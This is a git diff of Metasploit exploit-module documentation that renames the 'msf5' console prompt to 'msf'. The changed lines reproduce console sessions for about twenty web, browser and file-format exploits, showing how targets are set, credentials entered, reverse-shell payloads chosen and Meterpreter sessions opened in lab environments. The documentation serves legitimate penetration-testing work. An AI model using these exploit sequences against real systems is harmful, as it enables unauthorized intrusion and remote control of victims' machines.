+++ b/documentation/modules/exploit/unix/webapp/fusionpbx_exec_cmd_exec.md @@ -48,16 +48,16 @@ ## Scenarios ``` - msf5 > use exploit/unix/webapp/fusionpbx_exec_cmd_exec - msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set rhosts 172.16.191.214 + msf > use exploit/unix/webapp/fusionpbx_exec_cmd_exec + msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set rhosts 172.16.191.214 rhosts => 172.16.191.214 - msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set username admin + msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set username admin username => admin - msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set password PXRtwZqSkvToC4gc + msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set password PXRtwZqSkvToC4gc password => PXRtwZqSkvToC4gc - msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set lhost 172.16.191.165 + msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > show targets + msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > show targets Exploit targets: @@ -68,7 +68,7 @@ 2 Automatic (Linux Dropper) - msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > run + msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] Authenticated as user 'admin' diff --git a/documentation/modules/exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec.md b/documentation/modules/exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec.md index 0dcacd7ce6..70923bdaf7 100644 --- a/documentation/modules/exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec.md +++ b/documentation/modules/exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec.md @@ -71,16 +71,16 @@ ## Scenarios ``` - msf5 > use exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec - msf5 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set rhosts 172.16.191.214 + msf > use exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec + msf exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set rhosts 172.16.191.214 rhosts => 172.16.191.214 - msf5 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set username test + msf exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set username test username => test - msf5 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set password wBXxcY4LTAsMd46! + msf exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set password wBXxcY4LTAsMd46! password => wBXxcY4LTAsMd46! - msf5 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set lhost 172.16.191.165 + msf exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > run + msf exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > run [*] Started reverse TCP double handler on 172.16.191.165:4444 [+] Authenticated as user 'test' diff --git a/documentation/modules/exploit/unix/webapp/joomla_comfields_sqli_rce.md b/documentation/modules/exploit/unix/webapp/joomla_comfields_sqli_rce.md index 4f63cb5f9b..4b35e2db6b 100644 --- a/documentation/modules/exploit/unix/webapp/joomla_comfields_sqli_rce.md +++ b/documentation/modules/exploit/unix/webapp/joomla_comfields_sqli_rce.md @@ -18,7 +18,7 @@ ### Joomla 3.7.0 on Windows 7 SP1 with Super User authenticated ``` -msf5 exploit(unix/webapp/joomla_comfields_sqli_rce) > run +msf exploit(unix/webapp/joomla_comfields_sqli_rce) > run [*] Started reverse TCP handler on 172.22.222.138:4444 [*] 172.22.222.122:80 - Retrieved table prefix [ unqi0 ] diff --git a/documentation/modules/exploit/unix/webapp/jquery_file_upload.md b/documentation/modules/exploit/unix/webapp/jquery_file_upload.md index 1fbaac76b7..97886923ca 100644 --- a/documentation/modules/exploit/unix/webapp/jquery_file_upload.md +++ b/documentation/modules/exploit/unix/webapp/jquery_file_upload.md @@ -36,13 +36,13 @@ You may want to use another tool like `dirb` to handle enumeration. ## Usage ``` -msf5 exploit(unix/webapp/jquery_file_upload) > check +msf exploit(unix/webapp/jquery_file_upload) > check [*] Checking /jQuery-File-Upload/package.json [+] Found Apache 2.4.18 (AllowOverride None may be set) [+] Found unpatched jQuery File Upload 9.22.0 [*] 172.28.128.3:80 The target appears to be vulnerable. -msf5 exploit(unix/webapp/jquery_file_upload) > run +msf exploit(unix/webapp/jquery_file_upload) > run [*] Started reverse TCP handler on 172.28.128.1:4444 [*] Checking /jQuery-File-Upload/package.json diff --git a/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md b/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md index be4b43864e..2ba01b30fb 100644 --- a/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md +++ b/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md @@ -33,14 +33,14 @@ The HTTP server virtual host. You will probably need to configure this as well, Tested OpenNetAdmin 18.1.1 on Ubuntu 19.10 x64 ``` -msf5 > use exploit/unix/webapp/opennetadmin_ping_cmd_injection -msf5 exploit(opennetadmin_ping_cmd_injection) > set RHOSTS 172.16.172.152 +msf > use exploit/unix/webapp/opennetadmin_ping_cmd_injection +msf exploit(opennetadmin_ping_cmd_injection) > set RHOSTS 172.16.172.152 RHOSTS => 172.16.172.152 -msf5 exploit(opennetadmin_ping_cmd_injection) > set VHOST example.com +msf exploit(opennetadmin_ping_cmd_injection) > set VHOST example.com VHOST => example.com -msf5 exploit(opennetadmin_ping_cmd_injection) > set LHOST 172.16.172.1 +msf exploit(opennetadmin_ping_cmd_injection) > set LHOST 172.16.172.1 LHOST => 172.16.172.1 -msf5 exploit(opennetadmin_ping_cmd_injection) > exploit +msf exploit(opennetadmin_ping_cmd_injection) > exploit [*] Started reverse TCP handler on 172.16.172.1:4444 [*] Exploiting... [*] Sending stage (3021284 bytes) to 172.16.172.152 diff --git a/documentation/modules/exploit/unix/webapp/opensis_chain_exec.md b/documentation/modules/exploit/unix/webapp/opensis_chain_exec.md index 8bf73caa21..71873918ff 100644 --- a/documentation/modules/exploit/unix/webapp/opensis_chain_exec.md +++ b/documentation/modules/exploit/unix/webapp/opensis_chain_exec.md @@ -31,10 +31,10 @@ The base path to the web application (e.g. `/opensis/`). The default value is `/ **openSIS 7.4 running on Ubuntu 18.04.4** ``` -msf5 > use unix/webapp/opensis_chain_exec -msf5 exploit(unix/webapp/opensis_chain_exec) > set RHOSTS localhost -msf5 exploit(unix/webapp/opensis_chain_exec) > set TARGETURI /opensis/ -msf5 exploit(unix/webapp/opensis_chain_exec) > check +msf > use unix/webapp/opensis_chain_exec +msf exploit(unix/webapp/opensis_chain_exec) > set RHOSTS localhost +msf exploit(unix/webapp/opensis_chain_exec) > set TARGETURI /opensis/ +msf exploit(unix/webapp/opensis_chain_exec) > check [*] Retrieving session cookie [*] Injecting malicious SQL into session variable @@ -42,7 +42,7 @@ msf5 exploit(unix/webapp/opensis_chain_exec) > check [*] Executing PHP code by calling Bottom.php [+] 127.0.0.1:80 - The target is vulnerable. -msf5 exploit(unix/webapp/opensis_chain_exec) > run +msf exploit(unix/webapp/opensis_chain_exec) > run [*] Started reverse TCP handler on 127.0.0.1:4444 [*] Retrieving session cookie diff --git a/documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md b/documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md index 97919c83c6..40c91525ae 100644 --- a/documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md +++ b/documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md @@ -32,17 +32,17 @@ ## Scenarios ``` - msf5 > use exploit/unix/webapp/rconfig_install_cmd_exec - msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set rhosts 172.16.191.131 + msf > use exploit/unix/webapp/rconfig_install_cmd_exec + msf exploit(unix/webapp/rconfig_install_cmd_exec) > set rhosts 172.16.191.131 rhosts => 172.16.191.131 - msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set verbose true + msf exploit(unix/webapp/rconfig_install_cmd_exec) > set verbose true verbose => true - msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > check + msf exploit(unix/webapp/rconfig_install_cmd_exec) > check [*] Executing command: id [*] Response: uid=48(apache) gid=48(apache) groups=48(apache) [+] 172.16.191.131:443 - The target is vulnerable. - msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > show targets + msf exploit(unix/webapp/rconfig_install_cmd_exec) > show targets Exploit targets: @@ -52,13 +52,13 @@ 1 Automatic (Linux Dropper) - msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set target 0 + msf exploit(unix/webapp/rconfig_install_cmd_exec) > set target 0 target => 0 - msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set payload cmd/unix/reverse_perl + msf exploit(unix/webapp/rconfig_install_cmd_exec) > set payload cmd/unix/reverse_perl payload => cmd/unix/reverse_perl - msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set lhost 172.16.191.165 + msf exploit(unix/webapp/rconfig_install_cmd_exec) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > run + msf exploit(unix/webapp/rconfig_install_cmd_exec) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [*] Executing command: id @@ -77,6 +77,6 @@ "" [*] 172.16.191.131 - Command shell session 1 closed. Reason: User exit - msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > + msf exploit(unix/webapp/rconfig_install_cmd_exec) > ``` diff --git a/documentation/modules/exploit/unix/webapp/thinkphp_rce.md b/documentation/modules/exploit/unix/webapp/thinkphp_rce.md index 3660984024..e4eabefbed 100644 --- a/documentation/modules/exploit/unix/webapp/thinkphp_rce.md +++ b/documentation/modules/exploit/unix/webapp/thinkphp_rce.md @@ -44,8 +44,8 @@ to a different port to bind the command stager server to. ### ThinkPHP 5.0.20 from [Vulhub](https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce) ``` -msf5 > use exploit/unix/webapp/thinkphp_rce -msf5 exploit(unix/webapp/thinkphp_rce) > options +msf > use exploit/unix/webapp/thinkphp_rce +msf exploit(unix/webapp/thinkphp_rce) > options Module options (exploit/unix/webapp/thinkphp_rce): @@ -78,13 +78,13 @@ Exploit target: 1 Linux Dropper -msf5 exploit(unix/webapp/thinkphp_rce) > set rhosts 127.0.0.1 +msf exploit(unix/webapp/thinkphp_rce) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(unix/webapp/thinkphp_rce) > set lhost 192.168.1.3 +msf exploit(unix/webapp/thinkphp_rce) > set lhost 192.168.1.3 lhost => 192.168.1.3 -msf5 exploit(unix/webapp/thinkphp_rce) > set srvport 8888 +msf exploit(unix/webapp/thinkphp_rce) > set srvport 8888 srvport => 8888 -msf5 exploit(unix/webapp/thinkphp_rce) > run +msf exploit(unix/webapp/thinkphp_rce) > run [*] Started reverse TCP handler on 192.168.1.3:4444 [*] Executing automatic check (disable AutoCheck to override) @@ -115,7 +115,7 @@ meterpreter > ### ThinkPHP 5.0.23 from [Vulhub](https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce) ``` -msf5 exploit(unix/webapp/thinkphp_rce) > run +msf exploit(unix/webapp/thinkphp_rce) > run [*] Started reverse TCP handler on 192.168.1.3:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce.md b/documentation/modules/exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce.md index 8f5b6548b7..3cd15c160e 100644 --- a/documentation/modules/exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce.md +++ b/documentation/modules/exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce.md @@ -45,10 +45,10 @@ Follow [Setup](#setup) and [Scenarios](#scenarios). ### Trixbox CE v2.8.0.4 ``` -msf5 > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set rhosts 192.168.1.8 +msf > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set rhosts 192.168.1.8 rhosts => 192.168.1.8 -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show options +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show options Module options (exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce): @@ -82,9 +82,9 @@ Exploit target: 0 Automatic (Linux Dropper) -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set lhost 192.168.1.10 +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set lhost 192.168.1.10 lhost => 192.168.1.10 -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > exploit +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > exploit [*] Started reverse TCP handler on 192.168.1.10:4444 [*] 192.168.1.8:80 - Authenticating using "maint:password" credentials... @@ -112,10 +112,10 @@ asterisk ### Trixbox CE v2.4.0 ``` -msf5 > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set rhosts 192.168.1.7 +msf > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set rhosts 192.168.1.7 rhosts => 192.168.1.7 -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show options +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show options Module options (exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce): @@ -149,9 +149,9 @@ Exploit target: 0 Automatic (Linux Dropper) -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set lhost 192.168.1.10 +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set lhost 192.168.1.10 lhost => 192.168.1.10 -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > exploit +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > exploit [*] Started reverse TCP handler on 192.168.1.10:4444 [*] 192.168.1.7:80 - Authenticating using "maint:password" credentials... @@ -179,8 +179,8 @@ asterisk ### Trixbox CE v1.2.0 ``` -msf5 > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show options +msf > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show options Module options (exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce): @@ -214,13 +214,13 @@ Exploit target: 0 Automatic (Linux Dropper) -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set LHOST 192.168.205.1 +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set LHOST 192.168.205.1 LHOST => 192.168.205.1 -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set SRVHOST 192.168.205.1 +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set SRVHOST 192.168.205.1 SRVHOST => 192.168.205.1 -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set RHOSTS 192.168.205.148 +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set RHOSTS 192.168.205.148 RHOSTS => 192.168.205.148 -msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > exploit +msf exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > exploit [*] Started reverse TCP handler on 192.168.205.1:4444 [*] 192.168.205.148:80 - Authenticating using "maint:password" credentials... diff --git a/documentation/modules/exploit/unix/webapp/webmin_upload_exec.md b/documentation/modules/exploit/unix/webapp/webmin_upload_exec.md index d28421dc43..422c58d9cd 100644 --- a/documentation/modules/exploit/unix/webapp/webmin_upload_exec.md +++ b/documentation/modules/exploit/unix/webapp/webmin_upload_exec.md @@ -25,14 +25,14 @@ Use default installation path `/usr/share/webmin/` ### Tested Webmin 1.900 on Ubuntu 18.04 x64 ``` -msf5 > use exploit/unix/webapp/webmin_upload_exec -msf5 exploit(unix/webapp/webmin_upload_exec) > set rhosts 172.22.222.154 +msf > use exploit/unix/webapp/webmin_upload_exec +msf exploit(unix/webapp/webmin_upload_exec) > set rhosts 172.22.222.154 rhosts => 172.22.222.154 -msf5 exploit(unix/webapp/webmin_upload_exec) > set username unixuser +msf exploit(unix/webapp/webmin_upload_exec) > set username unixuser username => unixuser -msf5 exploit(unix/webapp/webmin_upload_exec) > set password unixuser +msf exploit(unix/webapp/webmin_upload_exec) > set password unixuser password => unixuser -msf5 exploit(unix/webapp/webmin_upload_exec) > exploit +msf exploit(unix/webapp/webmin_upload_exec) > exploit [*] Started reverse TCP handler on 172.22.222.136:4444 [+] Session cookie: 6215747dab393701e0acbb9ac5b7c699 @@ -41,9 +41,9 @@ msf5 exploit(unix/webapp/webmin_upload_exec) > exploit [-] Failed to determine webmin share directory [-] Set GUESSUPLOAD to attempt upload to a default location [*] Exploit completed, but no session was created. -msf5 exploit(unix/webapp/webmin_upload_exec) > set guessupload true +msf exploit(unix/webapp/webmin_upload_exec) > set guessupload true guessupload => true -msf5 exploit(unix/webapp/webmin_upload_exec) > exploit +msf exploit(unix/webapp/webmin_upload_exec) > exploit [*] Started reverse TCP handler on 172.22.222.136:4444 [+] Session cookie: 46cbd354e4532fe55d1a462db128905c diff --git a/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md b/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md index 476a72c016..92b9d000f2 100644 --- a/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md +++ b/documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md @@ -56,8 +56,8 @@ This is the default setting. ### InfiniteWP Client 1.9.4.4 on WordPress 4.8.3 ``` -msf5 > use exploit/unix/webapp/wp_infinitewp_auth_bypass -msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > options +msf > use exploit/unix/webapp/wp_infinitewp_auth_bypass +msf exploit(unix/webapp/wp_infinitewp_auth_bypass) > options Module options (exploit/unix/webapp/wp_infinitewp_auth_bypass): @@ -88,13 +88,13 @@ Exploit target: 0 InfiniteWP Client < 1.9.4.5 -msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rhosts 127.0.0.1 +msf exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rport 8000 +msf exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rport 8000 rport => 8000 -msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set lhost 192.168.56.1 +msf exploit(unix/webapp/wp_infinitewp_auth_bypass) > set lhost 192.168.56.1 lhost => 192.168.56.1 -msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > run +msf exploit(unix/webapp/wp_infinitewp_auth_bypass) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/unix/webapp/wp_plainview_activity_monitor_rce.md b/documentation/modules/exploit/unix/webapp/wp_plainview_activity_monitor_rce.md index 4f4a508212..72ff66756a 100644 --- a/documentation/modules/exploit/unix/webapp/wp_plainview_activity_monitor_rce.md +++ b/documentation/modules/exploit/unix/webapp/wp_plainview_activity_monitor_rce.md @@ -43,16 +43,16 @@ ## Scenarios ``` - msf5 > use exploit/unix/webapp/wp_plainview_activity_monitor_rce - msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set rhosts wordpress.test.local + msf > use exploit/unix/webapp/wp_plainview_activity_monitor_rce + msf exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set rhosts wordpress.test.local rhosts => wordpress.test.local - msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set username admin + msf exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set username admin username => admin - msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set password 123456 + msf exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set password 123456 password => 123456 - msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set vhost wordpress.test.local + msf exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set vhost wordpress.test.local vhost => wordpress.test.local - msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > show targets + msf exploit(unix/webapp/wp_plainview_activity_monitor_rce) > show targets Exploit targets: @@ -61,7 +61,7 @@ 0 WordPress - msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > exploit + msf exploit(unix/webapp/wp_plainview_activity_monitor_rce) > exploit [*] Started reverse TCP handler on 10.0.0.2:4444 [*] Trying to login... diff --git a/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md b/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md index 158be74834..711bcfaa6b 100644 --- a/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md +++ b/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md @@ -66,20 +66,20 @@ ## Scenarios ``` - msf5 > use exploit/unix/webapp/xymon_useradm_cmd_exec - msf5 exploit(unix/webapp/xymon_useradm_cmd_exec) > set rhosts xymon.local + msf > use exploit/unix/webapp/xymon_useradm_cmd_exec + msf exploit(unix/webapp/xymon_useradm_cmd_exec) > set rhosts xymon.local rhosts => xymon.local - msf5 exploit(unix/webapp/xymon_useradm_cmd_exec) > set username admin + msf exploit(unix/webapp/xymon_useradm_cmd_exec) > set username admin username => admin - msf5 exploit(unix/webapp/xymon_useradm_cmd_exec) > set password password + msf exploit(unix/webapp/xymon_useradm_cmd_exec) > set password password password => password - msf5 exploit(unix/webapp/xymon_useradm_cmd_exec) > set verbose true + msf exploit(unix/webapp/xymon_useradm_cmd_exec) > set verbose true verbose => true - msf5 exploit(unix/webapp/xymon_useradm_cmd_exec) > check + msf exploit(unix/webapp/xymon_useradm_cmd_exec) > check [*] 10.1.1.132:80 - Xymon version 4.3.10 [*] 10.1.1.132:80 - The target appears to be vulnerable. - msf5 exploit(unix/webapp/xymon_useradm_cmd_exec) > run + msf exploit(unix/webapp/xymon_useradm_cmd_exec) > run [*] Started reverse TCP handler on 10.1.1.170:4444 [*] 10.1.1.132:80 - Xymon version 4.3.10 diff --git a/documentation/modules/exploit/windows/browser/chrome_filereader_uaf.md b/documentation/modules/exploit/windows/browser/chrome_filereader_uaf.md index 09c82d7594..7fa78fc95e 100644 --- a/documentation/modules/exploit/windows/browser/chrome_filereader_uaf.md +++ b/documentation/modules/exploit/windows/browser/chrome_filereader_uaf.md @@ -24,12 +24,12 @@ Additional memory protections mean this exploit technique is not as straightforw ``` -msf5 > use exploit/windows/browser/chrome_filereader_uaf -msf5 exploit(windows/browser/chrome_filereader_uaf) > set URIPATH / +msf > use exploit/windows/browser/chrome_filereader_uaf +msf exploit(windows/browser/chrome_filereader_uaf) > set URIPATH / URIPATH => / -msf5 exploit(windows/browser/chrome_filereader_uaf) > set LHOST 192.168.0.1 +msf exploit(windows/browser/chrome_filereader_uaf) > set LHOST 192.168.0.1 LHOST => 192.168.0.1 -msf5 exploit(windows/browser/chrome_filereader_uaf) > run +msf exploit(windows/browser/chrome_filereader_uaf) > run [*] Started reverse TCP handler on 192.168.0.1:4444 [*] Using URL: http://0.0.0.0:8080/ [*] Local IP: http://192.168.0.1:8080/ diff --git a/documentation/modules/exploit/windows/browser/getgodm_http_response_bof.md b/documentation/modules/exploit/windows/browser/getgodm_http_response_bof.md index afb22c8908..275b033734 100644 --- a/documentation/modules/exploit/windows/browser/getgodm_http_response_bof.md +++ b/documentation/modules/exploit/windows/browser/getgodm_http_response_bof.md @@ -9,12 +9,12 @@ at [GetGo Download Manager 5.3.0.2712](https://www.exploit-db.com/apps/b26d82ead To use this, first start the module like the following example: ``` -msf5 exploit(windows/browser/getgodm_http_response_bof) > run +msf exploit(windows/browser/getgodm_http_response_bof) > run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.0.12:4444 -msf5 exploit(windows/browser/getgodm_http_response_bof) > [*] Using URL: http://0.0.0.0:8080/shakeitoff.mp3 +msf exploit(windows/browser/getgodm_http_response_bof) > [*] Using URL: http://0.0.0.0:8080/shakeitoff.mp3 [*] Local IP: http://192.168.0.12:8080/shakeitoff.mp3 [*] Server started. ``` diff --git a/documentation/modules/exploit/windows/fileformat/adobe_reader_u3d.md b/documentation/modules/exploit/windows/fileformat/adobe_reader_u3d.md index 6e6660a8db..9f3b6e28c8 100644 --- a/documentation/modules/exploit/windows/fileformat/adobe_reader_u3d.md +++ b/documentation/modules/exploit/windows/fileformat/adobe_reader_u3d.md @@ -47,7 +47,7 @@ Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/downl msf exploit(windows/fileformat/adobe_reader_u3d) > use exploit/multi/handler msf exploit(multi/handler) > set LHOST 192.168.1.3 LHOST => 192.168.1.3 - msf5 exploit(multi/handler) > exploit + msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.1.3:4444 [*] Sending stage (180291 bytes) to 192.168.1.5 diff --git a/documentation/modules/exploit/windows/fileformat/boxoft_wav_to_mp3.md b/documentation/modules/exploit/windows/fileformat/boxoft_wav_to_mp3.md index aeb78d65c5..b154a0f312 100644 --- a/documentation/modules/exploit/windows/fileformat/boxoft_wav_to_mp3.md +++ b/documentation/modules/exploit/windows/fileformat/boxoft_wav_to_mp3.md @@ -38,12 +38,12 @@ Run Exploit ``` - msf5 > use exploit/windows/fileformat/boxoft_wav_to_mp3 - msf5 exploit(windows/fileformat/boxoft_wav_to_mp3) > set payload windows/meterpreter/reverse_tcp + msf > use exploit/windows/fileformat/boxoft_wav_to_mp3 + msf exploit(windows/fileformat/boxoft_wav_to_mp3) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp - msf5 exploit(windows/fileformat/boxoft_wav_to_mp3) > set lhost 192.168.37.1 + msf exploit(windows/fileformat/boxoft_wav_to_mp3) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(windows/fileformat/boxoft_wav_to_mp3) > run + msf exploit(windows/fileformat/boxoft_wav_to_mp3) > run [+] music.wav stored at /Users/space/.msf4/local/music.wav @@ -51,12 +51,12 @@ Set up Handler ``` - msf5 > use exploit/multi/handler - msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp + msf > use exploit/multi/handler + msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp - msf5 exploit(multi/handler) > set lhost 192.168.37.1 + msf exploit(multi/handler) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(multi/handler) > run + msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Sending stage (179779 bytes) to 192.168.37.138 diff --git a/documentation/modules/exploit/windows/fileformat/cyberlink_lpp_bof.md b/documentation/modules/exploit/windows/fileformat/cyberlink_lpp_bof.md index 0571fc8198..8a154e72cd 100644 --- a/documentation/modules/exploit/windows/fileformat/cyberlink_lpp_bof.md +++ b/documentation/modules/exploit/windows/fileformat/cyberlink_lpp_bof.md @@ -29,28 +29,28 @@ CyberLink LabelPrint v2.5, which is available with [Power2Go 12 Essential](https ### Tested Windows 10 x64 running CyberLink LabelPrint v2.5 ``` -msf5 > use exploit/multi/handler -msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp +msf > use exploit/multi/handler +msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(multi/handler) > set lhost 172.22.222.132 +msf exploit(multi/handler) > set lhost 172.22.222.132 lhost => 172.22.222.132 -msf5 exploit(multi/handler) > set exitonsession false +msf exploit(multi/handler) > set exitonsession false exitonsession => false -msf5 exploit(multi/handler) > exploit -j +msf exploit(multi/handler) > exploit -j [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. -msf5 exploit(multi/handler) > +msf exploit(multi/handler) > [*] Started reverse TCP handler on 172.22.222.132:4444 use windows/fileformat/cyberlink_lpp_bof -msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > set lhost 172.22.222.132 +msf exploit(windows/fileformat/cyberlink_lpp_bof) > set lhost 172.22.222.132 lhost => 172.22.222.132 -msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > set target 2 +msf exploit(windows/fileformat/cyberlink_lpp_bof) > set target 2 target => 2 -msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > exploit +msf exploit(windows/fileformat/cyberlink_lpp_bof) > exploit [*] Creating 'msf.lpp' file ... [+] msf.lpp stored at /home/msfdev/.msf4/local/msf.lpp -msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > +msf exploit(windows/fileformat/cyberlink_lpp_bof) > [*] Sending stage (179779 bytes) to 172.22.222.200 [*] Meterpreter session 1 opened (172.22.222.132:4444 -> 172.22.222.200:50522) at 2018-12-11 06:24:38 -0600 sessions -i 1 diff --git a/documentation/modules/exploit/windows/fileformat/documalis_pdf_editor_and_scanner.md 